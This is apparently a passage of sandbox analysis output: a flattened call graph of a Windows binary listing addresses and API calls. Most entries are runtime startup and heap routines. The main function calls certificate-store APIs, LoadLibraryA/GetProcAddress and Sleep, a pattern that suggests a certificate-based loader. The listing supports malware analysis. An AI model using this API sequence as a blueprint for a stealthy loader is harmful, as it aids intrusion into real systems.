___scrt_is_nonwritable_in_current_image 6692->6693 6703 f25d23 EnterCriticalSection 6693->6703 6695 f29cbe 6696 f29cf0 6695->6696 6697 f29ce5 6695->6697 6699 f247f9 __dosmaperr 15 API calls 6696->6699 6704 f29dcd 6697->6704 6700 f29ceb 6699->6700 6719 f29d1a 6700->6719 6702 f29d0d _abort 6702->6691 6703->6695 6705 f25dfa 21 API calls 6704->6705 6708 f29ddd 6705->6708 6706 f29de3 6722 f25d69 6706->6722 6708->6706 6709 f29e15 6708->6709 6711 f25dfa 21 API calls 6708->6711 6709->6706 6712 f25dfa 21 API calls 6709->6712 6714 f29e0c 6711->6714 6715 f29e21 CloseHandle 6712->6715 6713 f29e5d 6713->6700 6717 f25dfa 21 API calls 6714->6717 6715->6706 6718 f29e2d GetLastError 6715->6718 6716 f247c3 __dosmaperr 15 API calls 6716->6713 6717->6709 6718->6706 6731 f25d46 LeaveCriticalSection 6719->6731 6721 f29d24 6721->6702 6723 f25d78 6722->6723 6724 f25ddf 6722->6724 6723->6724 6729 f25da2 6723->6729 6725 f247f9 __dosmaperr 15 API calls 6724->6725 6726 f25de4 6725->6726 6727 f247e6 __dosmaperr 15 API calls 6726->6727 6728 f25dcf 6727->6728 6728->6713 6728->6716 6729->6728 6730 f25dc9 SetStdHandle 6729->6730 6730->6728 6731->6721 6732->6497 6733->6477 6734 f27d1c 6735 f2522b 46 API calls 6734->6735 6736 f27d21 6735->6736 6182 f2365d 6183 f23e89 33 API calls 6182->6183 6184 f23665 6183->6184 6185 f21442 6186 f21a6a GetModuleHandleW 6185->6186 6187 f2144a 6186->6187 6188 f21480 6187->6188 6189 f2144e 6187->6189 6190 f23793 _abort 23 API calls 6188->6190 6191 f21459 6189->6191 6194 f23775 6189->6194 6192 f21488 6190->6192 6195 f2355e _abort 23 API calls 6194->6195 6196 f23780 6195->6196 6196->6191 5951 f29ec3 5952 f29ed9 5951->5952 5953 f29ecd 5951->5953 5953->5952 5954 f29ed2 CloseHandle 5953->5954 5954->5952 6737 f23400 6738 f23412 6737->6738 6739 f23418 6737->6739 6740 f23376 15 API calls 6738->6740 6740->6739 6741 f21e00 6744 f21e1e ___except_validate_context_record _ValidateLocalCookies __IsNonwritableInCurrentImage 6741->6744 6742 f21e9e _ValidateLocalCookies 6744->6742 6746 f22340 RtlUnwind 6744->6746 6745 f21f27 _ValidateLocalCookies 6746->6745 6197 f23d41 6200 f2341b 6197->6200 6201 f2342a 6200->6201 6202 f23376 15 API calls 6201->6202 6203 f23444 6202->6203 6204 f23376 15 API calls 6203->6204 6205 f2344f 6204->6205 6059 f23d86 6060 f21f7d ___scrt_uninitialize_crt 7 API calls 6059->6060 6061 f23d8d 6060->6061 6206 f29146 IsProcessorFeaturePresent 5955 f298c5 5957 f298ed 5955->5957 5956 f29925 5957->5956 5958 f29917 5957->5958 5959 f2991e 5957->5959 5961 f29997 16 API calls 5958->5961 5964 f29980 5959->5964 5963 f2991c 5961->5963 5965 f299a0 5964->5965 5966 f2a06f __startOneArgErrorHandling 16 API calls 5965->5966 5967 f29923 5966->5967 6062 f24c8a 6067 f24cbf 6062->6067 6065 f24ca6 6066 f24869 _free 15 API calls 6066->6065 6068 f24cd1 6067->6068 6069 f24c98 6067->6069 6070 f24d01 6068->6070 6071 f24cd6 6068->6071 6069->6065 6069->6066 6070->6069 6078 f2681b 6070->6078 6072 f2480c _abort 15 API calls 6071->6072 6074 f24cdf 6072->6074 6076 f24869 _free 15 API calls 6074->6076 6075 f24d1c 6077 f24869 _free 15 API calls 6075->6077 6076->6069 6077->6069 6079 f26826 6078->6079 6080 f2684e 6079->6080 6081 f2683f 6079->6081 6083 f2685d 6080->6083 6087 f27e13 6080->6087 6084 f247f9 __dosmaperr 15 API calls 6081->6084 6094 f27e46 6083->6094 6086 f26844 _abort 6084->6086 6086->6075 6088 f27e33 HeapSize 6087->6088 6089 f27e1e 6087->6089 6088->6083 6090 f247f9 __dosmaperr 15 API calls 6089->6090 6091 f27e23 6090->6091 6092 f2473d _abort 21 API calls 6091->6092 6093 f27e2e 6092->6093 6093->6083 6095 f27e53 6094->6095 6096 f27e5e 6094->6096 6097 f262ff 16 API calls 6095->6097 6098 f27e66 6096->6098 6104 f27e6f _abort 6096->6104 6102 f27e5b 6097->6102 6099 f24869 _free 15 API calls 6098->6099 6099->6102 6100 f27e74 6103 f247f9 __dosmaperr 15 API calls 6100->6103 6101 f27e99 HeapReAlloc 6101->6102 6101->6104 6102->6086 6103->6102 6104->6100 6104->6101 6105 f26992 _abort 2 API calls 6104->6105 6105->6104 6207 f21248 6208 f21250 6207->6208 6224 f237f7 6208->6224 6210 f2125b 6231 f21664 6210->6231 6212 f2191f 4 API calls 6213 f212f2 6212->6213 6214 f21270 __RTC_Initialize 6222 f212cd 6214->6222 6237 f217f1 6214->6237 6216 f21289 6216->6222 6240 f218ab InitializeSListHead 6216->6240 6218 f2129f 6241 f218ba 6218->6241 6220 f212c2 6247 f23891 6220->6247 6222->6212 6223 f212ea 6222->6223 6225 f23806 6224->6225 6226 f23829 6224->6226 6225->6226 6227 f247f9 __dosmaperr 15 API calls 6225->6227 6226->6210 6228 f23819 6227->6228 6229 f2473d _abort 21 API calls 6228->6229 6230 f23824 6229->6230 6230->6210 6232 f21670 6231->6232 6233 f21674 6231->6233 6232->6214 6234 f21681 ___scrt_release_startup_lock 6233->6234 6235 f2191f 4 API calls 6233->6235 6234->6214 6236 f216ea 6235->6236 6254 f217c4 6237->6254 6240->6218 6292 f23e2a 6241->6292 6243 f218cb 6244 f218d2 6243->6244 6245 f2191f 4 API calls 6243->6245 6244->6220 6246 f218da 6245->6246 6246->6220 6248 f24424 _abort 33 API calls 6247->6248 6250 f2389c 6248->6250 6249 f238d4 6249->6222 6250->6249 6251 f247f9 __dosmaperr 15 API calls 6250->6251 6252 f238c9 6251->6252 6253 f2473d _abort 21 API calls 6252->6253 6253->6249 6255 f217d3 6254->6255 6256 f217da 6254->6256 6260 f23c81 6255->6260 6263 f23cf1 6256->6263 6259 f217d8 6259->6216 6261 f23cf1 24 API calls 6260->6261 6262 f23c93 6261->6262 6262->6259 6266 f239f8 6263->6266 6269 f2392e 6266->6269 6268 f23a1c 6268->6259 6270 f2393a ___scrt_is_nonwritable_in_current_image 6269->6270 6277 f256e2 EnterCriticalSection 6270->6277 6272 f23948 6278 f23b40 6272->6278 6274 f23955 6288 f23973 6274->6288 6276 f23966 _abort 6276->6268 6277->6272 6279 f23b5e 6278->6279 6286 f23b56 _abort 6278->6286 6280 f23bb7 6279->6280 6281 f2681b 24 API calls 6279->6281 6279->6286 6282 f2681b 24 API calls 6280->6282 6280->6286 6283 f23bad 6281->6283 6284 f23bcd 6282->6284 6285 f24869 _free 15 API calls 6283->6285 6287 f24869 _free 15 API calls 6284->6287 6285->6280 6286->6274 6287->6286 6291 f2572a LeaveCriticalSection 6288->6291 6290 f2397d 6290->6276 6291->6290 6293 f23e48 6292->6293 6297 f23e68 6292->6297 6294 f247f9 __dosmaperr 15 API calls 6293->6294 6295 f23e5e 6294->6295 6296 f2473d _abort 21 API calls 6295->6296 6296->6297 6297->6243 6106 f21489 6109 f21853 6106->6109 6108 f2148e 6108->6108 6110 f21869 6109->6110 6112 f21872 6110->6112 6113 f21806 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6110->6113 6112->6108 6113->6112 5968 f255ce GetCommandLineA GetCommandLineW 6114 f23d8f 6115 f23db2 6114->6115 6116 f23d9e 6114->6116 6117 f24869 _free 15 API calls 6115->6117 6116->6115 6118 f24869 _free 15 API calls 6116->6118 6119 f23dc4 6117->6119 6118->6115 6120 f24869 _free 15 API calls 6119->6120 6121 f23dd7 6120->6121 6122 f24869 _free 15 API calls 6121->6122 6123 f23de8 6122->6123 6124 f24869 _free 15 API calls 6123->6124 6125 f23df9 6124->6125 6747 f2430f 6748 f2431a 6747->6748 6749 f2432a 6747->6749 6753 f24330 6748->6753 6752 f24869 _free 15 API calls 6752->6749 6754 f24343 6753->6754 6757 f24349 6753->6757 6755 f24869 _free 15 API calls 6754->6755 6755->6757 6756 f24869 _free 15 API calls 6758 f24355 6756->6758 6757->6756 6759 f24869 _free 15 API calls 6758->6759 6760 f24360 6759->6760 6761 f24869 _free 15 API calls 6760->6761 6762 f2436b 6761->6762 6763 f24869 _free 15 API calls 6762->6763 6764 f24376 6763->6764 6765 f24869 _free 15 API calls 6764->6765 6766 f24381 6765->6766 6767 f24869 _free 15 API calls 6766->6767 6768 f2438c 6767->6768 6769 f24869 _free 15 API calls 6768->6769 6770 f24397 6769->6770 6771 f24869 _free 15 API calls 6770->6771 6772 f243a2 6771->6772 6773 f24869 _free 15 API calls 6772->6773 6774 f243b0 6773->6774 6779 f241f6 6774->6779 6785 f24102 6779->6785 6781 f2421a 6782 f24246 6781->6782 6798 f24163 6782->6798 6784 f2426a 6784->6752 6786 f2410e ___scrt_is_nonwritable_in_current_image 6785->6786 6793 f256e2 EnterCriticalSection 6786->6793 6788 f24118 6791 f24869 _free 15 API calls 6788->6791 6792 f24142 6788->6792 6790 f2414f _abort 6790->6781 6791->6792 6794 f24157 6792->6794 6793->6788 6797 f2572a LeaveCriticalSection 6794->6797 6796 f24161 6796->6790 6797->6796 6799 f2416f ___scrt_is_nonwritable_in_current_image 6798->6799 6806 f256e2 EnterCriticalSection 6799->6806 6801 f24179 6802 f243d9 _abort 15 API calls 6801->6802 6803 f2418c 6802->6803 6807 f241a2 6803->6807 6805 f2419a _abort 6805->6784 6806->6801 6810 f2572a LeaveCriticalSection 6807->6810 6809 f241ac 6809->6805 6810->6809 5032 f2130d 5033 f21319 ___scrt_is_nonwritable_in_current_image 5032->5033 5060 f2162b 5033->5060 5035 f21320 5036 f21473 5035->5036 5043 f2134a ___scrt_is_nonwritable_in_current_image _abort ___scrt_release_startup_lock 5035->5043 5112 f2191f IsProcessorFeaturePresent 5036->5112 5038 f2147a 5039 f21480 5038->5039 5116 f237e1 5038->5116 5119 f23793 5039->5119 5044 f21369 5043->5044 5045 f213ea 5043->5045 5097 f237a9 5043->5097 5068 f21a34 5045->5068 5052 f21405 5103 f21a6a GetModuleHandleW 5052->5103 5055 f21410 5056 f21419 5055->5056 5105 f23784 5055->5105 5108 f2179c 5056->5108 5061 f21634 5060->5061 5122 f21bd4 IsProcessorFeaturePresent 5061->5122 5065 f21645 5067 f21649 5065->5067 5132 f21f7d 5065->5132 5067->5035 5192 f220b0 5068->5192 5071 f213f0 5072 f23457 5071->5072 5194 f2522b 5072->5194 5074 f213f8 5077 f21000 6 API calls 5074->5077 5075 f23460 5075->5074 5198 f255b6 5075->5198 5078 f211e3 Sleep 5077->5078 5079 f21096 CryptMsgGetParam 5077->5079 5080 f21215 CertCloseStore LocalFree LocalFree LocalFree 5078->5080 5084 f211f7 5078->5084 5081 f21162 CryptMsgGetParam 5079->5081 5082 f210bc LocalAlloc 5079->5082 5080->5052 5081->5078 5083 f21174 CryptMsgGetParam 5081->5083 5085 f21156 LocalFree 5082->5085 5086 f210d7 5082->5086 5083->5078 5087 f21188 CertFindAttribute CertFindAttribute 5083->5087 5084->5080 5088 f2120a CertDeleteCertificateFromStore 5084->5088 5085->5081 5089 f210e0 LocalAlloc CryptMsgGetParam 5086->5089 5090 f211b1 5087->5090 5091 f211b5 LoadLibraryA GetProcAddress 5087->5091 5088->5084 5092 f21114 CertCreateCertificateContext 5089->5092 5093 f2113d LocalFree 5089->5093 5090->5078 5090->5091 5091->5078 5095 f21133 CertFreeCertificateContext 5092->5095 5096 f21126 CertAddCertificateContextToStore 5092->5096 5093->5089 5094 f2114d 5093->5094 5094->5085 5095->5093 5096->5095 5098 f237d1 _abort 5097->5098 5098->5045 5099 f24424 _abort 33 API calls 5098->5099 5102 f23e9a 5099->5102 5100 f23f24 _abort 33 API calls 5101 f23ec4 5100->5101 5102->5100 5104 f2140c 5103->5104 5104->5038 5104->5055 5686 f2355e 5105->5686 5107 f2378f 5107->5056 5109 f217a8 ___scrt_uninitialize_crt 5108->5109 5110 f21421 5109->5110 5111 f21f7d ___scrt_uninitialize_crt 7 API calls 5109->5111 5110->5044 5111->5110 5113 f21935 _abort 5112->5113 5114 f219e0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5113->5114 5115 f21a24 _abort 5114->5115 5115->5038 5117 f2355e _abort 23 API calls 5116->5117 5118 f237f2 5117->5118 5118->5039 5120 f2355e _abort 23 API calls 5119->5120 5121 f21488 5120->5121 5123 f21640 5122->5123 5124 f21f5e 5123->5124 5138 f224b1 5124->5138 5126 f21f67 5126->5065 5129 f21f6f 5130 f21f7a 5129->5130 5152 f224ed 5129->5152 5130->5065 5133 f21f90 5132->5133 5134 f21f86 5132->5134 5133->5067 5135 f22496 ___vcrt_uninitialize_ptd 6 API calls 5134->5135 5136 f21f8b 5135->5136 5137 f224ed ___vcrt_uninitialize_locks DeleteCriticalSection 5136->5137 5137->5133 5139 f224ba 5138->5139 5141 f224e3 5139->5141 5143 f21f63 5139->5143 5156 f2271d 5139->5156 5142 f224ed ___vcrt_uninitialize_locks DeleteCriticalSection 5141->5142 5142->5143 5143->5126 5144 f22463 5143->5144 5173 f2262e 5144->5173 5149 f22493 5149->5129 5151 f22478 5151->5129 5153 f224f8 5152->5153 5155 f22517 5152->5155 5154 f22502 DeleteCriticalSection 5153->5154 5154->5154 5154->5155 5155->5126 5161 f22543 5156->5161 5159 f22740 5159->5139 5160 f22755 InitializeCriticalSectionAndSpinCount 5160->5159 5162 f22560 5161->5162 5165 f22564 5161->5165 5162->5159 5162->5160 5163 f225cc GetProcAddress 5163->5162 5165->5162 5165->5163 5166 f225bd 5165->5166 5168 f225e3 LoadLibraryExW 5165->5168 5166->5163 5167 f225c5 FreeLibrary 5166->5167 5167->5163 5169 f225fa GetLastError 5168->5169 5170 f2262a 5168->5170 5169->5170 5171 f22605 ___vcrt_FlsFree 5169->5171 5170->5165 5171->5170 5172 f2261b LoadLibraryExW 5171->5172 5172->5165 5174 f22543 ___vcrt_FlsFree 5 API calls 5173->5174 5175 f22648 5174->5175 5176 f22661 TlsAlloc 5175->5176 5177 f2246d 5175->5177 5177->5151 5178 f226df 5177->5178 5179 f22543 ___vcrt_FlsFree 5 API calls 5178->5179 5180 f226f9 5179->5180 5181 f22714 TlsSetValue 5180->5181 5182 f22486 5180->5182 5181->5182 5182->5149 5183 f22496 5182->5183 5184 f224a0 5183->5184 5185 f224a6 5183->5185 5187 f22669 5184->5187 5185->5151 5188 f22543 ___vcrt_FlsFree 5 API calls 5187->5188 5189 f22683 5188->5189 5190 f2269b TlsFree 5189->5190 5191 f2268f 5189->5191 5190->5191 5191->5185 5193 f21a47 GetStartupInfoW 5192->5193 5193->5071 5195 f2523d 5194->5195 5196 f25234 5194->5196 5195->5075 5201 f2512a 5196->5201 5683 f2555d 5198->5683 5221 f24424 GetLastError 5201->5221 5203 f25137 5241 f25249 5203->5241 5205 f2513f 5250 f24ebe 5205->5250 5208 f25156 5208->5195 5211 f25199 5275 f24869 5211->5275 5214 f2518c 5215 f25194 5214->5215 5218 f251b1 5214->5218 5272 f247f9 5215->5272 5217 f251dd 5217->5211 5281 f24d94 5217->5281 5218->5217 5219 f24869 _free 15 API calls 5218->5219 5219->5217 5222 f24440 5221->5222 5223 f2443a 5221->5223 5227 f2448f SetLastError 5222->5227 5289 f2480c 5222->5289 5284 f25904 5223->5284 5227->5203 5229 f2446f 5231 f2445a 5229->5231 5232 f24476 5229->5232 5230 f24869 _free 15 API calls 5233 f24460 5230->5233 5231->5230 5301 f24296 5232->5301 5235 f2449b SetLastError 5233->5235 5306 f23f24 5235->5306 5238 f24869 _free 15 API calls 5240 f24488 5238->5240 5240->5227 5240->5235 5242 f25255 ___scrt_is_nonwritable_in_current_image 5241->5242 5243 f24424 _abort 33 API calls 5242->5243 5245 f2525f 5243->5245 5246 f23f24 _abort 33 API calls 5245->5246 5248 f252e3 _abort 5245->5248 5249 f24869 _free 15 API calls 5245->5249 5542 f256e2 EnterCriticalSection 5245->5542 5543 f252da 5245->5543 5246->5245 5248->5205 5249->5245 5547 f23f72 5250->5547 5253 f24ef1 5255 f24f08 5253->5255 5256 f24ef6 GetACP 5253->5256 5254 f24edf GetOEMCP 5254->5255 5255->5208 5257 f262ff 5255->5257 5256->5255 5258 f2633d 5257->5258 5262 f2630d _abort 5257->5262 5259 f247f9 __dosmaperr 15 API calls 5258->5259 5261 f25167 5259->5261 5260 f26328 HeapAlloc 5260->5261 5260->5262 5261->5211 5264 f252eb 5261->5264 5262->5258 5262->5260 5263 f26992 _abort 2 API calls 5262->5263 5263->5262 5265 f24ebe 35 API calls 5264->5265 5267 f2530a 5265->5267 5266 f25311 _ValidateLocalCookies 5266->5214 5267->5266 5268 f2535b IsValidCodePage 5267->5268 5271 f25380 _abort 5267->5271 5268->5266 5269 f2536d GetCPInfo 5268->5269 5269->5266 5269->5271 5584 f24f96 GetCPInfo 5271->5584 5273 f244a8 _abort 15 API calls 5272->5273 5274 f247fe 5273->5274 5274->5211 5276 f24874 HeapFree 5275->5276 5280 f2489d __dosmaperr 5275->5280 5277 f24889 5276->5277 5276->5280 5278 f247f9 __dosmaperr 13 API calls 5277->5278 5279 f2488f GetLastError 5278->5279 5279->5280 5280->5208 5647 f24d51 5281->5647 5283 f24db8 5283->5211 5317 f25741 5284->5317 5286 f2592b 5287 f25943 TlsGetValue 5286->5287 5288 f25937 _ValidateLocalCookies 5286->5288 5287->5288 5288->5222 5294 f24819 _abort 5289->5294 5290 f24844 HeapAlloc 5292 f24452 5290->5292 5290->5294 5291 f24859 5293 f247f9 __dosmaperr 14 API calls 5291->5293 5292->5231 5296 f2595a 5292->5296 5293->5292 5294->5290 5294->5291 5330 f26992 5294->5330 5297 f25741 _abort 5 API calls 5296->5297 5298 f25981 5297->5298 5299 f2599c TlsSetValue 5298->5299 5300 f25990 _ValidateLocalCookies 5298->5300 5299->5300 5300->5229 5344 f2426e 5301->5344 5452 f26b14 5306->5452 5309 f23f35 5311 f23f3e IsProcessorFeaturePresent 5309->5311 5312 f23f5c 5309->5312 5313 f23f49 5311->5313 5314 f23793 _abort 23 API calls 5312->5314 5480 f24573 5313->5480 5316 f23f66 5314->5316 5320 f2576d 5317->5320 5322 f25771 _abort 5317->5322 5318 f25791 5321 f2579d GetProcAddress 5318->5321 5318->5322 5320->5318 5320->5322 5323 f257dd 5320->5323 5321->5322 5322->5286 5324 f257f3 5323->5324 5325 f257fe LoadLibraryExW 5323->5325 5324->5320 5326 f2581b GetLastError 5325->5326 5327 f25833 5325->5327 5326->5327 5328 f25826 LoadLibraryExW 5326->5328 5327->5324 5329 f2584a FreeLibrary 5327->5329 5328->5327 5329->5324 5333 f269d6 5330->5333 5332 f269a8 _ValidateLocalCookies 5332->5294 5334 f269e2 ___scrt_is_nonwritable_in_current_image 5333->5334 5339 f256e2 EnterCriticalSection 5334->5339 5336 f269ed 5340 f26a1f 5336->5340 5338 f26a14 _abort 5338->5332 5339->5336 5343 f2572a LeaveCriticalSection 5340->5343 5342 f26a26 5342->5338 5343->5342 5350 f241ae 5344->5350 5346 f24292 5347 f2421e 5346->5347 5361 f240b2 5347->5361 5349 f24242 5349->5238 5351 f241ba ___scrt_is_nonwritable_in_current_image 5350->5351 5356 f256e2 EnterCriticalSection 5351->5356 5353 f241c4 5357 f241ea 5353->5357 5355 f241e2 _abort 5355->5346 5356->5353 5360 f2572a LeaveCriticalSection 5357->5360 5359 f241f4 5359->5355 5360->5359 5362 f240be ___scrt_is_nonwritable_in_current_image 5361->5362 5369 f256e2 EnterCriticalSection 5362->5369 5364 f240c8 5370 f243d9 5364->5370 5366 f240e0 5374 f240f6 5366->5374 5368 f240ee _abort 5368->5349 5369->5364 5371 f2440f __fassign 5370->5371 5372 f243e8 __fassign 5370->5372 5371->5366 5372->5371 5377 f26507 5372->5377 5451 f2572a LeaveCriticalSection 5374->5451 5376 f24100 5376->5368 5378 f26587 5377->5378 5383 f2651d 5377->5383 5380 f24869 _free 15 API calls 5378->5380 5403 f265d5 5378->5403 5381 f265a9 5380->5381 5382 f24869 _free 15 API calls 5381->5382 5385 f265bc 5382->5385 5383->5378 5384 f24869 _free 15 API calls 5383->5384 5399 f26550 5383->5399 5388 f26545 5384->5388 5389 f24869 _free 15 API calls 5385->5389 5386 f24869 _free 15 API calls 5391 f2657c 5386->5391 5387 f265e3 5392 f26643 5387->5392 5402 f24869 15 API calls _free 5387->5402 5405 f26078 5388->5405 5395 f265ca 5389->5395 5390 f24869 _free 15 API calls 5396 f26567 5390->5396 5397 f24869 _free 15 API calls 5391->5397 5393 f24869 _free 15 API calls 5392->5393 5398 f26649 5393->5398 5400 f24869 _free 15 API calls 5395->5400 5433 f26176 5396->5433 5397->5378 5398->5371 5399->5390 5404 f26572 5399->5404 5400->5403 5402->5387 5445 f2667a 5403->5445 5404->5386 5406 f26172 5405->5406 5407 f26089 5405->5407 5406->5399 5408 f2609a 5407->5408 5409 f24869 _free 15 API calls 5407->5409 5410 f260ac 5408->5410 5411 f24869 _free 15 API calls 5408->5411 5409->5408 5412 f260be 5410->5412 5414 f24869 _free 15 API calls 5410->5414 5411->5410 5413 f260d0 5412->5413 5415 f24869 _free 15 API calls 5412->5415 5416 f260e2 5413->5416 5417 f24869 _free 15 API calls 5413->5417 5414->5412 5415->5413 5418 f260f4 5416->5418 5419 f24869 _free 15 API calls 5416->5419 5417->5416 5420 f26106 5418->5420 5422 f24869 _free 15 API calls 5418->5422 5419->5418 5421 f26118 5420->5421 5423 f24869 _free 15 API calls 5420->5423 5424 f2612a 5421->5424 5425 f24869 _free 15 API calls 5421->5425 5422->5420 5423->5421 5426 f2613c 5424->5426 5427 f24869 _free 15 API calls 5424->5427 5425->5424 5428 f2614e 5426->5428 5430 f24869 _free 15 API calls 5426->5430 5427->5426 5429 f26160 5428->5429 5431 f24869 _free 15 API calls 5428->5431 5429->5406 5432 f24869 _free 15 API calls 5429->5432 5430->5428 5431->5429 5432->5406 5434 f26183 5433->5434 5444 f261db 5433->5444 5435 f24869 _free 15 API calls 5434->5435 5437 f26193 5434->5437 5435->5437 5436 f261b7 5441 f261c9 5436->5441 5442 f24869 _free 15 API calls 5436->5442 5438 f24869 _free 15 API calls 5437->5438 5439 f261a5 5437->5439 5438->5439 5439->5436 5440 f24869 _free 15 API calls 5439->5440 5440->5436 5443 f24869 _free 15 API calls 5441->5443 5441->5444 5442->5441 5443->5444 5444->5404 5446 f26687 5445->5446 5450 f266a5 5445->5450 5447 f2621b __fassign 15 API calls 5446->5447 5446->5450 5448 f2669f 5447->5448 5449 f24869 _free 15 API calls 5448->5449 5449->5450 5450->5387 5451->5376 5484 f26a82 5452->5484 5455 f26b6f 5456 f26b7b _abort 5455->5456 5461 f26ba8 _abort 5456->5461 5463 f26ba2 _abort 5456->5463 5498 f244a8 GetLastError 5456->5498 5458 f26bf4 5459 f247f9 __dosmaperr 15 API calls 5458->5459 5460 f26bf9 5459->5460 5517 f2473d 5460->5517 5466 f26c20 5461->5466 5520 f256e2 EnterCriticalSection 5461->5520 5463->5458 5463->5461 5465 f26bd7 _abort 5463->5465 5465->5309 5468 f26c7f 5466->5468 5469 f26c77 5466->5469 5477 f26caa 5466->5477 5521 f2572a LeaveCriticalSection 5466->5521 5468->5477 5522 f26b66 5468->5522 5472 f23793 _abort 23 API calls 5469->5472 5472->5468 5474 f24424 _abort 33 API calls 5478 f26d0d 5474->5478 5476 f26b66 _abort 33 API calls 5476->5477 5525 f26d2f 5477->5525 5478->5465 5479 f24424 _abort 33 API calls 5478->5479 5479->5465 5481 f2458f _abort 5480->5481 5482 f245bb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5481->5482 5483 f2468c _abort _ValidateLocalCookies 5482->5483 5483->5312 5487 f26a28 5484->5487 5486 f23f29 5486->5309 5486->5455 5488 f26a34 ___scrt_is_nonwritable_in_current_image 5487->5488 5493 f256e2 EnterCriticalSection 5488->5493 5490 f26a42 5494 f26a76 5490->5494 5492 f26a69 _abort 5492->5486 5493->5490 5497 f2572a LeaveCriticalSection 5494->5497 5496 f26a80 5496->5492 5497->5496 5499 f244c1 5498->5499 5500 f244c7 5498->5500 5501 f25904 _abort 6 API calls 5499->5501 5502 f2480c _abort 12 API calls 5500->5502 5504 f2451e SetLastError 5500->5504 5501->5500 5503 f244d9 5502->5503 5505 f244e1 5503->5505 5507 f2595a _abort 6 API calls 5503->5507 5506 f24527 5504->5506 5508 f24869 _free 12 API calls 5505->5508 5506->5463 5509 f244f6 5507->5509 5510 f244e7 5508->5510 5509->5505 5511 f244fd 5509->5511 5513 f24515 SetLastError 5510->5513 5512 f24296 _abort 12 API calls 5511->5512 5514 f24508 5512->5514 5513->5506 5515 f24869 _free 12 API calls 5514->5515 5516 f2450e 5515->5516 5516->5504 5516->5513 5529 f246c2 5517->5529 5519 f24749 5519->5465 5520->5466 5521->5469 5523 f24424 _abort 33 API calls 5522->5523 5524 f26b6b 5523->5524 5524->5476 5526 f26d35 5525->5526 5527 f26cfe 5525->5527 5541 f2572a LeaveCriticalSection 5526->5541 5527->5465 5527->5474 5527->5478 5530 f244a8 _abort 15 API calls 5529->5530 5531 f246d8 5530->5531 5535 f246e6 _ValidateLocalCookies 5531->5535 5537 f2474d IsProcessorFeaturePresent 5531->5537 5533 f2473c 5534 f246c2 _abort 21 API calls 5533->5534 5536 f24749 5534->5536 5535->5519 5536->5519 5538 f24758 5537->5538 5539 f24573 _abort 3 API calls 5538->5539 5540 f2476d GetCurrentProcess TerminateProcess 5539->5540 5540->5533 5541->5527 5542->5245 5546 f2572a LeaveCriticalSection 5543->5546 5545 f252e1 5545->5245 5546->5545 5548 f23f85 5547->5548 5549 f23f8f 5547->5549 5548->5253 5548->5254 5549->5548 5550 f24424 _abort 33 API calls 5549->5550 5551 f23fb0 5550->5551 5555 f272d1 5551->5555 5556 f272e4 5555->5556 5557 f23fc9 5555->5557 5556->5557 5563 f26754 5556->5563 5559 f272fe 5557->5559 5560 f27311 5559->5560 5561 f27326 5559->5561 5560->5561 5562 f25249 __fassign 33 API calls 5560->5562 5561->5548 5562->5561 5564 f26760 ___scrt_is_nonwritable_in_current_image 5563->5564 5565 f24424 _abort 33 API calls 5564->5565 5566 f26769 5565->5566 5567 f267b7 _abort 5566->5567 5575 f256e2 EnterCriticalSection 5566->5575 5567->5557 5569 f26787 5576 f267cb 5569->5576 5574 f23f24 _abort 33 API calls 5574->5567 5575->5569 5577 f267d9 __fassign 5576->5577 5579 f2679b 5576->5579 5578 f26507 __fassign 15 API calls 5577->5578 5577->5579 5578->5579 5580 f267ba 5579->5580 5583 f2572a LeaveCriticalSection 5580->5583 5582 f267ae 5582->5567 5582->5574 5583->5582 5588 f24fd0 5584->5588 5591 f2507a _ValidateLocalCookies 5584->5591 5586 f25031 5604 f27cd1 5586->5604 5592 f2634d 5588->5592 5590 f27cd1 38 API calls 5590->5591 5591->5266 5593 f23f72 __fassign 33 API calls 5592->5593 5594 f2636d MultiByteToWideChar 5593->5594 5596 f263ab 5594->5596 5597 f26443 _ValidateLocalCookies 5594->5597 5599 f262ff 16 API calls 5596->5599 5600 f263cc _abort __alloca_probe_16 5596->5600 5597->5586 5598 f2643d 5609 f2646a 5598->5609 5599->5600 5600->5598 5602 f26411 MultiByteToWideChar 5600->5602 5602->5598 5603 f2642d GetStringTypeW 5602->5603 5603->5598 5605 f23f72 __fassign 33 API calls 5604->5605 5606 f27ce4 5605->5606 5613 f27ab4 5606->5613 5608 f25052 5608->5590 5610 f26476 5609->5610 5612 f26487 5609->5612 5611 f24869 _free 15 API calls 5610->5611 5610->5612 5611->5612 5612->5597 5614 f27acf 5613->5614 5615 f27af5 MultiByteToWideChar 5614->5615 5616 f27b1f 5615->5616 5617 f27ca9 _ValidateLocalCookies 5615->5617 5618 f262ff 16 API calls 5616->5618 5620 f27b40 __alloca_probe_16 5616->5620 5617->5608 5618->5620 5619 f27b89 MultiByteToWideChar 5621 f27ba2 5619->5621 5633 f27bf5 5619->5633 5620->5619 5620->5633 5638 f25a15 5621->5638 5622 f2646a __freea 15 API calls 5622->5617 5624 f27bb9 5625 f27c04 5624->5625 5626 f27bcc 5624->5626 5624->5633 5629 f262ff 16 API calls 5625->5629 5630 f27c25 __alloca_probe_16 5625->5630 5627 f25a15 6 API calls 5626->5627 5626->5633 5627->5633 5628 f27c9a 5632 f2646a __freea 15 API calls 5628->5632 5629->5630 5630->5628 5631 f25a15 6 API calls 5630->5631 5634 f27c79 5631->5634 5632->5633 5633->5622 5634->5628 5635 f27c88 WideCharToMultiByte 5634->5635 5635->5628 5636 f27cc8 5635->5636 5637 f2646a __freea 15 API calls 5636->5637 5637->5633 5639 f25741 _abort 5 API calls 5638->5639 5640 f25a3c 5639->5640 5643 f25a45 _ValidateLocalCookies 5640->5643 5644 f25a9d 5640->5644 5642 f25a85 LCMapStringW 5642->5643 5643->5624 5645 f25741 _abort 5 API calls 5644->5645 5646 f25ac4 _ValidateLocalCookies 5645->5646 5646->5642 5648 f24d5d ___scrt_is_nonwritable_in_current_image 5647->5648 5655 f256e2 EnterCriticalSection 5648->5655 5650 f24d67 5656 f24dbc 5650->5656 5654 f24d80 _abort 5654->5283 5655->5650 5668 f254dc 5656->5668 5658 f24e0a 5659 f254dc 21 API calls 5658->5659 5660 f24e26 5659->5660 5661 f254dc 21 API calls 5660->5661 5662 f24e44 5661->5662 5663 f24d74 5662->5663 5664 f24869 _free 15 API calls 5662->5664 5665 f24d88 5663->5665 5664->5663 5682 f2572a LeaveCriticalSection 5665->5682 5667 f24d92 5667->5654 5669 f254ed 5668->5669 5678 f254e9 5668->5678 5670 f254f4 